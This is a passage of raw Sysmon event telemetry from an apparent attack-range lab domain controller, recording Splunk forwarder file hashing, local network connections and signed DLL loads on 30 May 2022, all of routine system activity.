Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEEC9A5C8F17FD6FB25F423B62C27BB4,SHA256=F9873DDE44BF3B74D355499295E54A9F54012D3E0047F33FE1002B6C06C294F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:32.763{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFA3C99FAEBA7AC847F3E0C468AC5AC6,SHA256=FBD41A871DE8DF2E1DC3389B650BDC44711C4ECE702888A386090D585F2758B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:33.856{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA38E5230035A4DB5A37D7A09E7C1A83,SHA256=67BE1B561B81FC0420025425C6D4F8E6ED798FD3D3B8449FD935B6DDF93DB547,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:34.950{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D04C3E2EE139F0794707E739A06B598,SHA256=2CB641993DF1B9CB0087E2DDFF3B8A3BAE2FF57991371E88B2FD58A2E926E985,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:31.112{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53359-false10.0.1.12-8000- 23542300x8000000000000000100481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:36.044{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD6A749394F070152D36744CFB9C510F,SHA256=BC47C5AA66F16DF5F5E7A446358445623FE3B89D7F93A8DD06BD19431C28C038,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:37.137{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80E36D128609CF38CA33E10BC1C1B9A2,SHA256=D74721DAA58E660035B7F5002F7DB467F2B0B973DC7DAFF0E813186D04F2436B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:38.231{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D175536ED4E8C760982F50AED4D6E9,SHA256=B10F48899C2E4866791C151575559A1294B7D162DBFB48BB169E9AA009A1EC57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:39.325{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E79D5BE7D49DD0D7A0D811FC9A486F1,SHA256=E203D1D1FBCAC1F8FDBB6728A48F85976221F19CFD947F356DF8C3CB765C97D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:40.419{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA03DD8835D78FE388ED6724BD30F15E,SHA256=152FC785A5F23361E7CC324B86A2A21D4C5B86ECD3D5F0BBE8658CECFFDC5136,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:41.512{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A908F72CE139885135BA506B1468B1A5,SHA256=1B35CBF0C5471B6B6162A4C88DD93AD9D2F6AD5BFDBC1D3A01FA467F6F92AB3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:37.018{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53360-false10.0.1.12-8000- 23542300x8000000000000000100489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:42.606{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC8BDB7B258FF5CDFDDE817216D59558,SHA256=FF3C2E0826C349939582084FAD661F62A58BE152C2168DB9DE8A33F0AC43B318,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x8000000000000000100488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 
13:06:42.028{326FD73D-A254-6294-1000-000000005502}412C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d87426-0x1b22fd0b) 23542300x8000000000000000100491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:43.700{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78DB24C2C1A31AF56891DD9BE9026663,SHA256=9A1333A1409D658F6B11B4C3FB4701669FA9717A7E8C385432898B505271CC5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:43.669{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1F79AFB444B065E7A5D966FE8643FDE,SHA256=0414FD84B2F90C19325D97D82F1206214BE176B99C8EB43F4DCBF32FCB7AAFE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:44.794{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08C2A3673FCA77EDF0A4E5002E221E85,SHA256=7E532506BD7B0355316EDD539206954958C753A70C97B4003486B43F42B79AA6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:40.424{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53361-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x8000000000000000100492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:40.424{326FD73D-A262-6294-2300-000000005502}2720C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53361-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 734700x8000000000000000100543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.923{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid
734700x8000000000000000100540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid
734700x8000000000000000100539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid
734700x8000000000000000100538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid
734700x8000000000000000100537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid
734700x8000000000000000100536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid
734700x8000000000000000100535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid
734700x8000000000000000100534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid
734700x8000000000000000100533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid
734700x8000000000000000100532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid
734700x8000000000000000100531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid
734700x8000000000000000100530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid
734700x8000000000000000100529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid
734700x8000000000000000100528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid
734700x8000000000000000100527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid
734700x8000000000000000100526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid
734700x8000000000000000100525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid
734700x8000000000000000100524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid
734700x8000000000000000100523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid
734700x8000000000000000100522Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid
734700x8000000000000000100521Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid
734700x8000000000000000100520Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid
734700x8000000000000000100519Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid
734700x8000000000000000100518Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid
734700x8000000000000000100517Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid
734700x8000000000000000100516Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid
